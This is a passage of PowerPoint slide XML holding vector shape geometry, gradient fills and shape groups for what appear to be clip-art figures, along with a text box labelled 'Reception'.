                      <a:pt x="136" y="82"/>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="82"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="88"/>
                      <a:pt x="138" y="93"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="108"/>
                      <a:pt x="142" y="120"/>
                      <a:pt x="145" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="136"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="154"/>
                      <a:pt x="151" y="161"/>
                      <a:pt x="155" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="169"/>
                      <a:pt x="164" y="170"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="167"/>
                      <a:pt x="204" y="161"/>
                      <a:pt x="223" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254" y="147"/>
                      <a:pt x="236" y="110"/>
                      <a:pt x="209" y="119"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="2A79D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45" name="Freeform 599">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C97E7F4-DCDB-493B-9051-586428A0E3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40" y="1214"/>
                <a:ext cx="89" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 16 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 54 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 30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30" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="21"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="16" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="54" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="21"/>
                      <a:pt x="47" y="25"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="30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46" name="Oval 600">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B18CF97-D79F-43B0-BF9F-B2B64E666125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 flipH="1">
                <a:off x="2429" y="1132"/>
                <a:ext cx="119" cy="119"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC99"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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638" name="Text Box 1174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0882E26B-D8B0-4443-9C28-FF62311083B4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5821443" y="3187064"/>
              <a:ext cx="830677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Reception</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="639" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A700D604-5A82-4B18-BB2F-E88FE36F883F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5675372" y="4688255"/>
              <a:ext cx="4719822" cy="1290372"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 10238 w 37909"/>
                <a:gd name="T1" fmla="*/ 10200 h 10200"/>
                <a:gd name="T2" fmla="*/ 0 w 37909"/>
                <a:gd name="T3" fmla="*/ 7450 h 10200"/>
                <a:gd name="T4" fmla="*/ 27433 w 37909"/>
                <a:gd name="T5" fmla="*/ 71 h 10200"/>
                <a:gd name="T6" fmla="*/ 37909 w 37909"/>
                <a:gd name="T7" fmla="*/ 0 h 10200"/>
                <a:gd name="T8" fmla="*/ 37671 w 37909"/>
                <a:gd name="T9" fmla="*/ 2811 h 10200"/>
                <a:gd name="T10" fmla="*/ 10238 w 37909"/>
                <a:gd name="T11" fmla="*/ 10200 h 10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909" h="10200">
                  <a:moveTo>
                    <a:pt x="10238" y="10200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="7450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27433" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37909" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37671" y="2811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10238" y="10200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="DDDDDD">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="DDDDDD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640" name="Group 1272">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26575EB5-BED6-4CA5-843A-8E0BB9C9FE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10728" y="4495622"/>
              <a:ext cx="332672" cy="319694"/>
              <a:chOff x="1721" y="1306"/>
              <a:chExt cx="433" cy="415"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1038" name="Freeform 1273">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{398F4781-3E1A-452A-AD6C-5624EAFF53B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21" y="1306"/>
                <a:ext cx="433" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 362 h 1285"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 926 h 1285"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 0 h 1285"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 362 h 1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1285">
                    <a:moveTo>
                      <a:pt x="1344" y="362"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="36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9" name="Freeform 1274">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B091F4A-6AF2-44A3-999F-BFE5FDBAA25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961" y="1413"/>
                <a:ext cx="156" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 482 w 482"/>
                  <a:gd name="T1" fmla="*/ 130 h 791"/>
                  <a:gd name="T2" fmla="*/ 482 w 482"/>
                  <a:gd name="T3" fmla="*/ 791 h 791"/>
                  <a:gd name="T4" fmla="*/ 0 w 482"/>
                  <a:gd name="T5" fmla="*/ 661 h 791"/>
                  <a:gd name="T6" fmla="*/ 0 w 482"/>
                  <a:gd name="T7" fmla="*/ 0 h 791"/>
                  <a:gd name="T8" fmla="*/ 482 w 482"/>
                  <a:gd name="T9" fmla="*/ 130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2" h="791">
                    <a:moveTo>
                      <a:pt x="482" y="130"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="482" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="13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C080C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40" name="Freeform 1275">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5C341DB-6B7A-4C89-B53F-17658F0B42D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000" y="1465"/>
                <a:ext cx="78" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 243 w 243"/>
                  <a:gd name="T1" fmla="*/ 122 h 122"/>
                  <a:gd name="T2" fmla="*/ 243 w 243"/>
                  <a:gd name="T3" fmla="*/ 66 h 122"/>
                  <a:gd name="T4" fmla="*/ 0 w 243"/>
                  <a:gd name="T5" fmla="*/ 0 h 122"/>
                  <a:gd name="T6" fmla="*/ 0 w 243"/>
                  <a:gd name="T7" fmla="*/ 56 h 122"/>
                  <a:gd name="T8" fmla="*/ 243 w 243"/>
                  <a:gd name="T9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3" h="122">
                    <a:moveTo>
                      <a:pt x="243" y="122"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="243" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="1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cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="0C080C"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/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41" name="Freeform 1276">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45ED6159-9888-4CC8-80FC-EA58A637D8D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768" y="1436"/>
                <a:ext cx="155" cy="126"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 198 w 204"/>
                  <a:gd name="T1" fmla="*/ 0 h 165"/>
                  <a:gd name="T2" fmla="*/ 204 w 204"/>
                  <a:gd name="T3" fmla="*/ 9 h 165"/>
                  <a:gd name="T4" fmla="*/ 134 w 204"/>
                  <a:gd name="T5" fmla="*/ 69 h 165"/>
                  <a:gd name="T6" fmla="*/ 75 w 204"/>
                  <a:gd name="T7" fmla="*/ 151 h 165"/>
                  <a:gd name="T8" fmla="*/ 64 w 204"/>
                  <a:gd name="T9" fmla="*/ 155 h 165"/>
                  <a:gd name="T10" fmla="*/ 46 w 204"/>
                  <a:gd name="T11" fmla="*/ 165 h 165"/>
                  <a:gd name="T12" fmla="*/ 37 w 204"/>
                  <a:gd name="T13" fmla="*/ 139 h 165"/>
                  <a:gd name="T14" fmla="*/ 33 w 204"/>
                  <a:gd name="T15" fmla="*/ 128 h 165"/>
                  <a:gd name="T16" fmla="*/ 16 w 204"/>
                  <a:gd name="T17" fmla="*/ 91 h 165"/>
                  <a:gd name="T18" fmla="*/ 0 w 204"/>
                  <a:gd name="T19" fmla="*/ 73 h 165"/>
                  <a:gd name="T20" fmla="*/ 29 w 204"/>
                  <a:gd name="T21" fmla="*/ 63 h 165"/>
                  <a:gd name="T22" fmla="*/ 54 w 204"/>
                  <a:gd name="T23" fmla="*/ 102 h 165"/>
                  <a:gd name="T24" fmla="*/ 59 w 204"/>
                  <a:gd name="T25" fmla="*/ 114 h 165"/>
                  <a:gd name="T26" fmla="*/ 123 w 204"/>
                  <a:gd name="T27" fmla="*/ 45 h 165"/>
                  <a:gd name="T28" fmla="*/ 198 w 204"/>
                  <a:gd name="T29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4" h="165">
                    <a:moveTo>
                      <a:pt x="198" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="204" y="9"/>
                      <a:pt x="204" y="9"/>
                      <a:pt x="204" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="20"/>
                      <a:pt x="160" y="40"/>
                      <a:pt x="134" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="96"/>
                      <a:pt x="89" y="123"/>
                      <a:pt x="75" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="155"/>
                      <a:pt x="64" y="155"/>
                      <a:pt x="64" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="160"/>
                      <a:pt x="50" y="163"/>
                      <a:pt x="46" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="160"/>
                      <a:pt x="41" y="152"/>
                      <a:pt x="37" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="128"/>
                      <a:pt x="33" y="128"/>
                      <a:pt x="33" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="111"/>
                      <a:pt x="22" y="99"/>
                      <a:pt x="16" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="82"/>
                      <a:pt x="7" y="76"/>
                      <a:pt x="0" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="64"/>
                      <a:pt x="21" y="61"/>
                      <a:pt x="29" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="65"/>
                      <a:pt x="46" y="78"/>
                      <a:pt x="54" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="114"/>
                      <a:pt x="59" y="114"/>
                      <a:pt x="59" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="89"/>
                      <a:pt x="97" y="66"/>
                      <a:pt x="123" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="24"/>
                      <a:pt x="175" y="9"/>
                      <a:pt x="198" y="0"/>
                    </a:cubicBezTo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641" name="Freeform 1184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{658D203E-C34D-43BF-A4A1-E6D185F1F5FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8518614" y="4804699"/>
              <a:ext cx="1519434" cy="406991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642" name="Group 1253">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C852302-C987-4447-86CA-10529DE60E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11995" y="4669035"/>
              <a:ext cx="506085" cy="386937"/>
              <a:chOff x="3719" y="1289"/>
              <a:chExt cx="429" cy="328"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1009" name="Group 1252">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4722C65-2589-4C33-8CBB-28FE5F49E4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48" y="1289"/>
                <a:ext cx="155" cy="263"/>
                <a:chOff x="3948" y="1289"/>
                <a:chExt cx="155" cy="263"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1032" name="Freeform 1187">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33438CD-6611-4C6D-83D1-CFCA6CA1CB95}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3948" y="1332"/>
                  <a:ext cx="155" cy="121"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 237"/>
                    <a:gd name="T1" fmla="*/ 113 h 186"/>
                    <a:gd name="T2" fmla="*/ 235 w 237"/>
                    <a:gd name="T3" fmla="*/ 113 h 186"/>
                    <a:gd name="T4" fmla="*/ 225 w 237"/>
                    <a:gd name="T5" fmla="*/ 49 h 186"/>
                    <a:gd name="T6" fmla="*/ 199 w 237"/>
                    <a:gd name="T7" fmla="*/ 24 h 186"/>
                    <a:gd name="T8" fmla="*/ 156 w 237"/>
                    <a:gd name="T9" fmla="*/ 12 h 186"/>
                    <a:gd name="T10" fmla="*/ 116 w 237"/>
                    <a:gd name="T11" fmla="*/ 2 h 186"/>
                    <a:gd name="T12" fmla="*/ 87 w 237"/>
                    <a:gd name="T13" fmla="*/ 12 h 186"/>
                    <a:gd name="T14" fmla="*/ 73 w 237"/>
                    <a:gd name="T15" fmla="*/ 85 h 186"/>
                    <a:gd name="T16" fmla="*/ 73 w 237"/>
                    <a:gd name="T17" fmla="*/ 85 h 186"/>
                    <a:gd name="T18" fmla="*/ 72 w 237"/>
                    <a:gd name="T19" fmla="*/ 90 h 186"/>
                    <a:gd name="T20" fmla="*/ 21 w 237"/>
                    <a:gd name="T21" fmla="*/ 104 h 186"/>
                    <a:gd name="T22" fmla="*/ 26 w 237"/>
                    <a:gd name="T23" fmla="*/ 135 h 186"/>
                    <a:gd name="T24" fmla="*/ 80 w 237"/>
                    <a:gd name="T25" fmla="*/ 122 h 186"/>
                    <a:gd name="T26" fmla="*/ 80 w 237"/>
                    <a:gd name="T27" fmla="*/ 122 h 186"/>
                    <a:gd name="T28" fmla="*/ 86 w 237"/>
                    <a:gd name="T29" fmla="*/ 120 h 186"/>
                    <a:gd name="T30" fmla="*/ 99 w 237"/>
                    <a:gd name="T31" fmla="*/ 112 h 186"/>
                    <a:gd name="T32" fmla="*/ 104 w 237"/>
                    <a:gd name="T33" fmla="*/ 92 h 186"/>
                    <a:gd name="T34" fmla="*/ 104 w 237"/>
                    <a:gd name="T35" fmla="*/ 92 h 186"/>
                    <a:gd name="T36" fmla="*/ 110 w 237"/>
                    <a:gd name="T37" fmla="*/ 47 h 186"/>
                    <a:gd name="T38" fmla="*/ 109 w 237"/>
                    <a:gd name="T39" fmla="*/ 160 h 186"/>
                    <a:gd name="T40" fmla="*/ 119 w 237"/>
                    <a:gd name="T41" fmla="*/ 170 h 186"/>
                    <a:gd name="T42" fmla="*/ 169 w 237"/>
                    <a:gd name="T43" fmla="*/ 184 h 186"/>
                    <a:gd name="T44" fmla="*/ 196 w 237"/>
                    <a:gd name="T45" fmla="*/ 165 h 186"/>
                    <a:gd name="T46" fmla="*/ 196 w 237"/>
                    <a:gd name="T47" fmla="*/ 160 h 186"/>
                    <a:gd name="T48" fmla="*/ 216 w 237"/>
                    <a:gd name="T49" fmla="*/ 155 h 186"/>
                    <a:gd name="T50" fmla="*/ 219 w 237"/>
                    <a:gd name="T51" fmla="*/ 154 h 186"/>
                    <a:gd name="T52" fmla="*/ 232 w 237"/>
                    <a:gd name="T53" fmla="*/ 146 h 186"/>
                    <a:gd name="T54" fmla="*/ 237 w 237"/>
                    <a:gd name="T55" fmla="*/ 124 h 186"/>
                    <a:gd name="T56" fmla="*/ 235 w 237"/>
                    <a:gd name="T57" fmla="*/ 113 h 186"/>
                    <a:gd name="T58" fmla="*/ 193 w 237"/>
                    <a:gd name="T59" fmla="*/ 75 h 186"/>
                    <a:gd name="T60" fmla="*/ 194 w 237"/>
                    <a:gd name="T61" fmla="*/ 87 h 186"/>
                    <a:gd name="T62" fmla="*/ 200 w 237"/>
                    <a:gd name="T63" fmla="*/ 123 h 186"/>
                    <a:gd name="T64" fmla="*/ 196 w 237"/>
                    <a:gd name="T65" fmla="*/ 124 h 186"/>
                    <a:gd name="T66" fmla="*/ 194 w 237"/>
                    <a:gd name="T67" fmla="*/ 87 h 186"/>
                    <a:gd name="T68" fmla="*/ 193 w 237"/>
                    <a:gd name="T69" fmla="*/ 75 h 186"/>
                    <a:gd name="T70" fmla="*/ 192 w 237"/>
                    <a:gd name="T71" fmla="*/ 70 h 186"/>
                    <a:gd name="T72" fmla="*/ 193 w 237"/>
                    <a:gd name="T73" fmla="*/ 75 h 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7" h="186">
                      <a:moveTo>
                        <a:pt x="235" y="113"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="84"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="223" y="32"/>
                        <a:pt x="207" y="26"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="90" y="4"/>
                        <a:pt x="87" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="29" y="102"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="108"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="65"/>
                        <a:pt x="111" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="117"/>
                        <a:pt x="109" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="165"/>
                        <a:pt x="112" y="170"/>
                        <a:pt x="119" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="131" y="173"/>
                        <a:pt x="162" y="183"/>
                        <a:pt x="169" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="186"/>
                        <a:pt x="193" y="176"/>
                        <a:pt x="196" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="163"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="209" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="154"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="141"/>
                        <a:pt x="237" y="135"/>
                        <a:pt x="237" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="113"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="193" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="96"/>
                        <a:pt x="198" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="123"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="193" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="193" y="73"/>
                        <a:pt x="193" y="7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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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Freeform 1188">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2E7280-2EDD-46E2-BAC7-F2DB57DA261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4025" y="1324"/>
                  <a:ext cx="43" cy="27"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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5"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
